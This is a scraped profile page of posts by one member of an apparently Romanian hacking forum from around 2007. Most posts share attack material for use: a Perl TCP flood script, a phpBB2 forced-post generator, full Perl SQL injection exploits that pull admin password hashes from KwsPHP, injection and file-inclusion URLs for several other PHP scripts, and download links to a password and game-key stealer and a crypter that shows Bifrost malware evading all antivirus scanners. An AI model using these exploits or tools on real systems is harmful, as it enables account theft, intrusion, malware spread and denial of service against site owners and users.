Ras
-
Posts
1106 -
Joined
-
Last visited
-
Days Won
1
Posts posted by Ras
-
-
marfa!!
dabea astept sa il trimit la manelisti :twisted: :twisted:
-
as vrea si eu exploitul ala pls flood_ip.pl dak se ofera cnva sa mil dea in pm dak nu vreti altfel plsss ca nu il am
#!/usr/bin/perl
use IO::Socket::INET;
print "host: "; chomp($host=<STDIN>);
print "port: "; chomp($port=<STDIN>);
print "packets: "; chomp($packets=<STDIN>);
print "Start flood target -> $host:$port\n";
$x = 0;
while ($x < $packets)
{
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port);
$x += 1;
}
if ($x eq $packets) { print "$packets packet[s] send successfully"; } else { print "There is a problem with packet`s sending"; }
close($socket);search pe google...
EDIT
Download Perl: http://rapidshare.com/files/56619845/Perl.rar
-
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
[url]Http://www.inj3ct-it.org[/url] Staff[at]inj3ct-it[dot]org
--------------------------------------------------------------
0day Auto Sender Post phpBB2
---------------------------------------------------------------
# Coded by TuoNuX
# Description:
autosendform generator
---------------------------------------------------------------
---------------------------------------------------------------
asf.pl
---------------------------------------------------------------
#/usr/bin/perl
#0day Auto Sender Post phpBB2
#TuoNuX@hotmail.it
#[url]http://www.localh0st.altervista.org[/url]
#[url]http://www.hackingz0ne.altervista.org[/url]
print q {
_____________________________________________________________________
___ _ _ __ _
|_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2
| || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email]
|_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url]
* [url]http://www.hackingz0ne.altervista.org[/url]
0day Auto Sender Post phpBB2
_____________________________________________________________________
};
print q {
[+]Insert host site :
[-]Indirizzo: };
$indirizzo = <stdin>;
chomp($indirizzo);
print q {
_____________________________________________________________________
[+]Insert the forum path (for example /phpBB/) :
[-]Cartella: };
$cartella = <stdin>;
chomp($cartella);
print q {
_____________________________________________________________________
[+]Insert ID section ( number after "?f=" ):
[-]ID Sezione: };
$id = <stdin>;
chomp($id);
print q {
_____________________________________________________________________
[+]Insert Topic Title :
[-]Titolo: };
$titolo = <stdin>;
chomp($titolo);
print q {
_____________________________________________________________________
[+]Insert the body topic :
[+]Yuc can use also the BB code es: [img=urlimmagine]
[-]Testo: };
$testo = <stdin>;
chomp($testo);
print q {
_____________________________________________________________________
[+]Insert the victim sid , don't write everyone if there isn't it :
[-]Sid: };
$sid = <stdin>;
chomp($sid);
$sito = "http://$indirizzo$cartella";
print "\n----------------Riepilogo----------------------\n\n";
print "Forum => $sito\n";
print "ID Section => $id\n";
print "Title => $titolo\n";
print "Message => $testo\n";
print "SID => $sid\n\n";
print "----------------Riepilogo----------------------\n\n";
print "Enter for continued....";
<stdin>;
$m1 = q {<html><head><body><form action="};
$m2 = "$sito";
$m3 = q {posting.php" method="post" name="post"><textarea name="message" class="post">};
$m4 = "$testo";
$m5 = q {</textarea><input type="hidden" value="};
$m12 = "\n\nTuoNuX 0day phpBB2 Exploit\n\n\n";
$m6 = "$titolo";
$m7 = q {" class="post" tabindex="2" style="width: 450px;" maxlength="60" size="45" name="subject"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="poll_title"/><input type="hidden" value="" class="post" maxlength="255" size="50" name="add_poll_option_text"/><input type="hidden" value="0" class="post" maxlength="3" size="3" name="poll_length"/><input type="hidden" value="Anteprima" class="mainoption" name="preview" tabindex="5"/><input type="hidden" value="Invia" class="mainoption" name="post" tabindex="6" accesskey="s"/><input type="hidden" name="mode" value="newtopic" /><input type="hidden" name="f" value="};
$m8 = "$id";
$m9 = q {"> <input type="hidden" name="sid" value="};
$m10 = "$sid";
$m11 = q {" /></form><script>document.post.submit()</script></html></head></body>};
$html = "$m1$m2$m3$m4$m12$m5$m6$m7$m8$m9$m10$m11";
open ( FILE , ">phpBB20dayexploit.html" ) || die ( "" );
print FILE $html;
close ( FILE );
print q {
_____________________________________________________________________
___ _ _ __ _
|_ _|_ _ ___ | \ | _ _ \ \/ * 0day Auto Sender Post phpBB2
| || | |/ . \| || | | \ \ * [email]TuoNuX@hotmail.it[/email]
|_|`___|\___/|_\_|`___|_/\_\ * [url]http://www.localh0st.altervista.org[/url]
* [url]http://www.hackingz0ne.altervista.org[/url]
0day Auto Sender Post phpBB2 Page Saved !!!!...
Work this script on a webspace and you must visit it to victim.
Best ReGaRdS FoR localh0st & hackingz0ne
_____________________________________________________________________ -
scoala.......un subiect plictisitor
yo sunt la inceputul liceului [ cls a9-a ]
noroc cu boboacele astea bune ca altfel nu mha duceam !
si eu la fel...
-
cam naspa treaba...
poate omu e incepator si d'asta hexeaza.
-
stats module:
###################################################
# Script..........................: KwsPHP ver 1.0 stats Module
# Script Site..................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: Remote SQL injection Exploit
# Access.........................: Remote
# level.............................: Dangerous
# Author..........................: S4mi
# Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit Work Only When magic_quotes_gpc Is OFF
#
#Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################
#vuln code : \modules\stats\index.php line ~ 700 - 720
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# [code]
# elseif(isset($aff) && ($aff=="browser"))
# {
# if(isset($typenav))
# {
# bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]);
#
# $tot_nav=0;
#
# $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC ");
#
# while ($ligne = mysql_fetch_object($requete))
# {
# $tot_nav = $ligne->tot;
# }
# $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC");
##########################################################
#!/usr/bin/perl
use IO::Socket ;
&header();
&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));
$host = $ARGV[0];
$path = $ARGV[1];
$user = $ARGV[2];
syswrite STDOUT ,"\n Connecting ...";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n Unable to connect to $host\n" unless($sock);
syswrite STDOUT, "[OK]";
$inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*";
syswrite STDOUT ,"\n Sending Data ...";
print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";
while($answer = <$sock>){
if ($answer =~ /nav_(.*?).png/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $user\n";
print "+ Password: $1\n";
print "+ ----Have Fun---- +\n";
print "+ You don't need to crack the hash password \n";
print "+ Just login with ur owen information and edit the cookies\n";
}
}
sub usage{
print "\nUsage : perl $0 host /path/ UserName ";
print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";
exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script......................: KwsPHP ver 1.0 stats Module
# Script Site.................: http://kws.koogar.org/
# Vulnerability...............: Remote SQL injection Exploit
# Access......................: Remote
# level.......................: Dangerous
# Author......................: S4mi
# Contact.....................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
}
member_space module:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host = $ARGV[0];
$User = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
$port = "80";
print q(
################################################################
# Script....................: KwsPHP v1.0 Member_Space Module #
# Script Site...............: [url]http://kws.koogar.org/[/url] #
# Vulnerability.............: Remote SQL injection Exploit #
# Access....................: Remote #
# level.....................: Dangerous #
# Author....................: S4mi #
# Contact...................: S4mi[at]LinuxMail.org #
# This Exploit Work Only When magic_quotes_gpc Is OFF #
################### (C)oded By S4mi ############################
);
if (@ARGV < 3) {
print " # usage : xpl.pl host/path/ User Passwd\n";
print " # e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n";
exit();
}
print " [~] User/Password : $User/$passwd \n";
print " [~] Host : $url \n";
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
print " [~] Logining ...\n";
$xpl->cookie_jar( $cookie_jar );
$login = $xpl->post($url.'index.php',
Content => [
"pseudo" => "$User",
"pass" => "$passwd",
"submit" => "Se connecter",
],);
$evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E"
."\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E"
."\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72"
."\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31"
."\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30"
."\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68"
."\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74"
."\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31"
."\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31"
."\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73"
."\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C"
."\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73"
."\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A"
."\x2F\x69\x64\x3D\x31\x2F\x2A";
$offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61"
."\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64"
."\x69\x74\x65\x72\x26\x69\x64\x3D";
$target = $xpl->get($url."index.php?mod=$offset$evil0");
if($target->as_string =~ /value="username:(.*?"/) {
$zaz = $1;
print " [+] Exploit succeed! Getting admin information. \n";
print " [+] ------------------------------------------- \n";
}
if($target->as_string =~ /value="password:(.*?"/) {
$luks = $1;
print " [+] UserName : $zaz \n";
print " [+] Password : $luks \n";
}
else {
print " [-] Exploit Failed ! \n";
}
print "\n#############################################################\n";login.php:
###################################################
# Script..........................: KwsPHP ver 1.0
# Script Site..................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: login.php Remote SQL injection Exploit
# Access.........................: Remote
# level.............................: Dangerous
# Author..........................: S4mi
# Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
#
####################################################
# This Exploit work Only When magic_quotes_gpc Is OFF
#
#Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
###################################################
#!/usr/bin/perl
use IO::Socket ;
&header();
&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));
$host = $ARGV[0];
$path = $ARGV[1];
$user = $ARGV[2];
syswrite STDOUT ,"\n Connecting ...";
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n Unable to connect to $host\n" unless($sock);
syswrite STDOUT, "[OK]";
$inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer";
syswrite STDOUT ,"\n Sending Data ...";
print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";
while($answer = <$sock>){
if ($answer =~ /class="messagelogin">(.*?) /){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ----------------------- +\n";
print "+ Username: $user\n";
print "+ Password: $1\n";
print "+ -------Have Fun--------- +\n";
print "+ You don't need to crack the hash password \n";
print "+ Just login with ur owen information and edit the cookies\n";
}
}
sub usage{
print "\nUsage : perl $0 host /path/ UserName ";
print "\nExemple : perl $0 [url]www.victim.com[/url] /KwsPHP/ admin\n";
exit(0);
}
sub header(){
print q(
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script......................: KwsPHP ver 1.0
# Script Site.................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: Remote SQL injection Exploit
# Access......................: Remote
# level.......................: Dangerous
# Author......................: S4mi
# Contact.....................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
);
} -
# Chupix CMS 0.2.3 (download.php) Remote File Download Vulnerability
# P.Script : http://sourceforge.net/project/showfiles.php?group_id=134930
################################download.php################################
Lain:18->57 ->
********************************************************************************************************************
if(isset($_GET['fichier'])){ <--------------XXXX
*
// téléchargement du fichier
*
$file = "archives/". $_GET['repertoire'] ."/".
$_GET['fichier'];<--------------XXXX *
$fichier_txt = "archives/". $_GET['repertoire'] ."/cpt/". $_GET['fichier']
.".php" *
$repertoire = "archives/". $_GET['repertoire'] ."/cpt/";
*
if(is_file($fichier_txt)){
*
$fp = @fopen($fichier_txt, "r"); <--------------XXXX
*
$result = fread($fp, filesize ($fichier_txt));
*
fclose($fp);
*
$result = str_replace("<?php ", "", $result);
*
$result = str_replace("?>", "", $result);
*
*
$num = trim($result);
*
}else{
*
$num = 0;
*
}
*
$num++;
*
*
$msg = "<?php ". $num ." ?>";
*
*
if(!(is_dir($repertoire))){
*
mkdir ($repertoire, 0755);
*
}
*
*
$fp = @fopen($fichier_txt, "w+");<--------------XXXX
*
if (flock($fp, LOCK_EX)) { // pose un verrou exclusif
*
fwrite($fp, $msg);
*
flock($fp, LOCK_UN); // lib
-
la 5 ani... :shock: :shock: :shock:
-
cauta acel .ocx pe google, downloadeaza-l si punel in folderul cu clientul.
EDIT
sau poti sa pui acel .ocx in system32 si nu o sa iti mai zica niciun program ca lipseste acel .ocx
-
stiu ca exista un program cu care poti sa copiezi vocea dintr-o melodie.
dar cica se aude cam nasol adica nu e calitatea buna.
-
Link: http://www.youtube.com/watch?v=VtEFWyo4iJo&mode=related&search=
am tras o "portie" de ras
-
welcome! o sa te ajutam cum putem
-
Proxy - 12 Sept 2007
213.170.40.76:8080
213.170.40.76:80
213.170.40.76:3128
91.121.67.145:8080
193.30.164.3:80
195.175.37.70:8080
194.160.198.4:3128
89.149.164.130:3128
195.175.37.70:80
195.175.37.71:8080
140.247.53.18:80
213.160.129.52:3128
75.126.208.243:8080
66.162.135.6:80
149.142.90.225:80
212.25.95.135:80
200.65.0.25:3128
209.59.95.52:80
209.59.95.52:3128
200.65.0.25:80
70.97.43.138:11111
200.196.108.27:3128
203.69.39.251:80
203.69.39.250:80
151.204.42.140:8080
62.215.195.85:80
189.20.195.42:3128
66.98.238.8:3128
220.225.231.98:3128
211.115.115.220:8080
218.108.64.166:80
217.11.21.4:80
218.75.68.205:8080
122.153.25.130:3128
190.4.8.170:8080
196.36.198.91:80
124.138.131.3:3128
211.0.61.226:3128
125.246.154.66:3128
61.166.68.74:80
122.203.24.194:3128
203.160.1.50:554
203.160.1.40:554
203.160.1.44:553
200.171.25.62:3128
203.160.1.48:553
203.160.1.40:553
203.160.1.52:554
203.160.1.52:553
202.6.158.247:8080
218.106.254.79:80
189.4.208.139:3128
147.243.236.59:8080
210.212.95.103:8080
200.193.222.104:3128
61.6.69.62:3128
125.246.56.194:3128
125.243.201.2:8080
210.212.78.67:8080
122.153.7.130:3128
203.99.127.3:3128
222.88.75.243:3128
65.160.200.230:8080
219.139.35.71:3128
61.139.94.203:3128
200.148.212.246:3128
218.8.129.252:8000
84.22.67.115:80
203.66.115.133:3128
222.89.169.73:3128
122.153.16.66:3128
125.46.61.39:3128
80.73.73.178:3128
221.226.124.121:3128
212.11.182.2:80
122.203.17.130:3128
62.192.142.90:8080
85.33.42.189:3128
200.129.43.168:3128
62.90.252.49:3128
213.55.94.114:3128
220.130.112.6:3128
125.243.140.66:8080
201.11.156.196:3128
213.39.246.138:3128
195.175.37.71:80
84.254.206.168:3128
203.160.001.146:554
189.19.18.36:3128
201.18.29.130:3128
203.160.1.44:554
202.143.112.130:808
201.245.151.146:80
222.85.106.20:3128
189.19.241.229:80
210.19.150.3:3128
221.209.18.18:8000
222.221.254.162:3128
122.203.155.130:3128
88.249.250.156:8080
200.101.81.130:3128
12.40.36.72:8000
84.41.249.49:80
202.170.51.11:8080
201.116.14.99:8080
193.110.89.3:8080
202.83.125.131:3128
193.255.187.1:8080 -
Deci pentru unii este simplu sa sparga mailuri sau le sparg doar ca sa isi bata joc de altii, dar cum am spus mai sus mie mi sa furat mailul de catre o persoana care a schimbat parola si mi-a furat un cont de pe un site. Nu stiu cum a facut asta, dupa care a inceput santajul.......eu vreau sa sparg mailul si sa imi recuperez contul...nu ma prea intereseaza mailul in sine ci doar contul si de aceea sunt disperat....daca e cineva capabil ( ma indoiesc ca nu e) si vrea sa ma ajute (putin probabil) il rog din suflet.
Specific ca eu nu am folosit acel mail decat pentru site-uri si parola contului o stia doar o singura persoana care este de mare incredere pt mine care nu ar avea de ce sa faca chestia asta mai ales ca nu stia parola mailului!!
venom tu nu mai ai cum sa iti iei contul inapoi decat daca vorbesti cu cel care ti l-a spart.
cum ti l-a spart? te-ai logat pe o pagina falsa de yahoo? ai primit vreun fisier .exe de la cineva?
sa va intre si voua in cap ca nicio parola de yahoo nu se sparge direct (adica pui id si poc iti da pass)
-
-
PW Messanger Packet
-MSN Messenger
-Windows Messenger
-Yahoo Messenger (Version 5.x und 6.x)
-Google Talk
-ICQ Lite 4.x/5.x/2003
-AOL Instand Messenger/Netscape 7
-Trilian
-Miranda
-GAIM
PW Mail Packet
-Outlook Express
-Microsoft Outlook 2000/XP/2003
-IncrediMail
-Mozilla Thunderbird
-Netscape 6.x/7.x
-Group Mail Free, Gmail
-Yahoo Mail
-Hotmail / MSN Mail
-Eudora
Protected Storage PW Packet
-Outlook Passwords
-Auto Completet password in IE
-Password protected sites in IE
-MSN Explorer Passwords
Steam PW Packet
-Steam Username
-Steam Password
-Steam game-path
Game Key Stealer
-UT 2003/2004
-Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam
-Need for Speed Hot Pursuit 2
-James Bond 007 Nightfire
-Command & Conquer Generals / Zero Hour
-SimCity 4
-Call of Duty 2 / United Offensive / 1
-SWAT 4 / EXP
Windows Info Packet
Windows Username, Windows Computername ect. ect.
Download: http://rapidshare.com/files/54896185/UnLimited_PW_-_Stealer_0.40.rar
-
-
-
Bifrost server Resultaat: 0/32 (0%)
AhnLab-V3 2007.9.8.0 2007.09.07 -
AntiVir 7.6.0.5 2007.09.09 -
Authentium 4.93.8 2007.09.09 -
Avast 4.7.1043.0 2007.09.08 -
AVG 7.5.0.485 2007.09.09 -
BitDefender 7.2 2007.09.09 -
CAT-QuickHeal 9.00 2007.09.08 -
ClamAV 0.91.2 2007.09.09 -
DrWeb 4.33 2007.09.09 -
eSafe 7.0.15.0 2007.09.04 -
eTrust-Vet 31.1.5119 2007.09.08 -
Ewido 4.0 2007.09.09 -
FileAdvisor 1 2007.09.10 -
Fortinet 3.11.0.0 2007.09.08 -
F-Prot 4.3.2.48 2007.09.09 -
F-Secure 6.70.13030.0 2007.09.09 -
Ikarus T3.1.1.12 2007.09.09 -
Kaspersky 4.0.2.24 2007.09.09 -
McAfee 5115 2007.09.07 -
Microsoft 1.2803 2007.09.09 -
NOD32v2 2516 2007.09.09 -
Norman 5.80.02 2007.09.07 -
Panda 9.0.0.4 2007.09.09 -
Prevx1 V2 2007.09.10 -
Rising 19.39.62.00 2007.09.09 -
Sophos 4.21.0 2007.09.09 -
Sunbelt 2.2.907.0 2007.09.07 -
Symantec 10 2007.09.09 -
TheHacker 6.1.10.182 2007.09.08 -
VBA32 3.12.2.4 2007.09.09 -
VirusBuster 4.3.26:9 2007.09.09 -
Webwasher-Gateway 6.0.1 2007.09.09 -
Extra informatie
File size: 22967 bytes
MD5: e1d330c5a0dcb7f5095937fb13eb6b7f
SHA1: 3526e906354b07527b218709b2496868760de140First button: add
The second button: delete
The third button: new project
The fourth button: about
Download: http://rapidshare.com/files/54787756/PowerCrypt_v2.0.rar
-
Am sa va sparg la toti aidiurile pt ca is hacer. :twisted: :twisted: :twisted:
-
## Owner : Pr0T3cT10n
## Email : [email]Pr0T3cT10n@Gmail.Com[/email]
## Homepage : [url]www.kamikaz-team.com[/url]
## Script site : [url]http://www.phpnuke.org[/url]
## Script download : [url]http://www.spchat.org/modules.php?name=Downloads&d_op=getit&lid=19[/url]
## Script name : PHP-Nuke module(SPChat)
## Version : All
## Type : SQL Injection
## D0rk : inurl:name=SPChat
## Description :
## Pull out user details from the database
## Vuln :
## [url]http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=[/url][SQL Injection]
## [url]http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1[/url]
## NOTE :
## You need to be a regular user
## Thanks to some friend of mine.. -
########################################################################
# RW::Download v2.0.3 lite - Remote SQL Injection
# Vendor : [url]http://www.rwscripts.com/[/url]
# Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org
# Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net
# Dork : "Powered by RW::Download v2.0.3 lite"
#################################################
[url]http://localhost/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*[/url]
http://localhost/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/* -
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
[url]Http://www.inj3ct-it.org[/url] Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Multiple Remote File Inclusion Vulnerability
---------------------------------------------------------------
# Author: MhZ91 [email]nobody.91@hotmail.it[/email]
# Download Script: [url]http://sourceforge.net/projects/offl/[/url] Online Fantasy Football League 0.2.6
# Exploit:
# [url]http://[target]/[/url][path]/lib/functions.php?DOC_ROOT=[Shell]
# [url]http://[target]/[/url][path]/lib/header.php?DOC_ROOT=[Shell]
--------------------------------------------------------------- -
Here is a 0day sql injection for phpmyforum, admin hash disclosure. You need to register and post a message to make it work. This forum is completely in german, so it's a little hard to work with (if you're ignorant like me and don't know any other langs).
1. Register at forum.
2. Post a message in any forum.
3. Open the url, replacing "24" with the id of your post.
Codice:
http://target/editpost.php?id=24+union+select+concat(char(58,58,5Cool,id,char(58,58,5Cool,pass,char(58,58,5 Cool),id+from+pmf_user+where+group_id=1+order+by+1+asc+/*
4. The id and md5 hash should appear in the textarea on this page. It will look like:
:::1:::21232f297a57a5a743894a0e4a801fc3:::
"Am spart banca"
in Off-topic
Posted
Link: http://www.youtube.com/watch?v=9_yQDnfe2xA
Link: http://speed-blog.net/2007/09/18/nu-avem-banca-pai-furam-una-atunci/
In seara asta eu si cu tov mei nu aveam ce sa facem si ne-am hotarat sa... vedeti in acel video...